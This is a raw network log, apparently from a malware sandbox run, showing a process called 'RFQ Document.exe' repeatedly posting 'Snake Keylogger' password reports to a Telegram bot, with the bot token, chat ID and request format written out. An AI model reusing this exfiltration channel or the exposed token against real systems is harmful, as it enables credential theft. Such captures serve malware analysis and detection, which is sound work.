2021-09-28 05:59:42 UTC	424	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:42 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:42 UTC	424	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 35 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 32 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12854,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808782,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
267	192.168.2.4	50104	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:42 UTC	425	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f2b1806b Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:42 UTC	425	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 32 62 31 38 30 36 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f2b1806bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:42 UTC	425	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:42 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:42 UTC	426	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 35 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 32 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12855,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808782,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
268	192.168.2.4	50105	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:42 UTC	426	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f2e5f3fe Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:42 UTC	427	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 32 65 35 66 33 66 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f2e5f3feContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:43 UTC	427	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:43 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:43 UTC	427	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 35 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 33 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12856,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808783,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
269	192.168.2.4	50106	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:43 UTC	428	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f31ccb95 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:43 UTC	428	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 33 31 63 63 62 39 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f31ccb95Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:43 UTC	429	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:43 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:43 UTC	429	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 35 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 33 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12857,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808783,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
27	192.168.2.4	49801	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:26 UTC	43	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c51fba70 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:26 UTC	43	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 35 31 66 62 61 37 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c51fba70Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:26 UTC	43	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:26 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:26 UTC	44	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 30 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 36 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12607,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808706,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
270	192.168.2.4	50107	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:43 UTC	429	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f33968c1 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:43 UTC	430	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 33 33 39 36 38 63 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f33968c1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:43 UTC	430	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:43 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:43 UTC	431	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 35 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 33 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12858,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808783,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
271	192.168.2.4	50108	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:43 UTC	431	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f3513e44 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:43 UTC	431	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 33 35 31 33 65 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f3513e44Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:43 UTC	432	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:43 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:43 UTC	432	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 35 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 33 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12859,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808783,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
272	192.168.2.4	50109	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:43 UTC	433	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f3703e3c Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:43 UTC	433	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 33 37 30 33 65 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f3703e3cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:44 UTC	433	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:44 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:44 UTC	434	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 36 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 33 2c 22 64 Data Ascii: 